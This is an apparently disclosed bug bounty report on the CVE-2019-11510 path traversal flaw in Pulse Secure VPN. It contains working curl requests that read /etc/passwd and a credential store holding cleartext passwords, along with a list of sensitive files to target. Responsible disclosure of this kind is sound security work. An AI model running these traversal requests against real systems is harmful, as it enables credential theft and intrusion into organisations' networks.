Pulse Secure File disclosure, clear text and potential RCE

Disclosed: 2019-12-02 19:29:23 By alyssa_herrera To deptofdefense
Critical
Vulnerability Details
**Summary:** Pulse Secure has two main vulnerabilities that allow file disclosure and post auth RCE **Description:** CVE-2019-11510 is a file disclosure due to some normalization issues in pulse secure. I was able to reproduce this by grabbing in the etc/passswd. https://$hax/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/# Though the impact of that is very limited, medium to high sec at best. From here we can grab a specific file. The file /data/runtime/mtmp/lmdb/dataa/data.mdb contains clear context passwords and usernames, when a user logs in from here we can then access the Pulse secure instance. I stopped here due to not wanting to break the rules of engagements but from here I would log in then exploit a Post auth exploit. Here's a list of files that an attacker would instantly hit /data/runtime/mtmp/system /data/runtime/mtmp/lmdb/dataa/data.mdb /data/runtime/mtmp/lmdb/dataa/lock.mdb /data/runtime/mtmp/lmdb/randomVal/data.mdb /data/runtime/mtmp/lmdb/randomVal/lock.mdb ## Impact Critical ## Step-by-step Reproduction Instructions We can only do this using due to browsers messing up the exploit curl --path-as-is -k -D- https://████████/dana-na/../dana/html5acc/guacamole/../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/# curl --path-as-is -k -D- https://████████/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/# curl --path-as-is -k -D- https://███/dana-na/../dana/html5acc/guacamole/../../../../../../data/runtime/mtmp/lmdb/dataa/data.mdb?/dana/html5acc/guacamole/# ## Product, Version, and Configuration (If applicable) Pulse Secure ## Suggested Mitigation/Remediation Actions Patch pulse immediately ## Impact An attacker will be able to download internal files and specifically target a local file which stores clear text passwords when a user login. This also an attacker to access highly sensitive internal areas and even can perform command execution
Actions
View on HackerOne
Report Stats
  • Report ID: 671749
  • State: Closed
  • Substate: resolved
  • Upvotes: 31
Share this report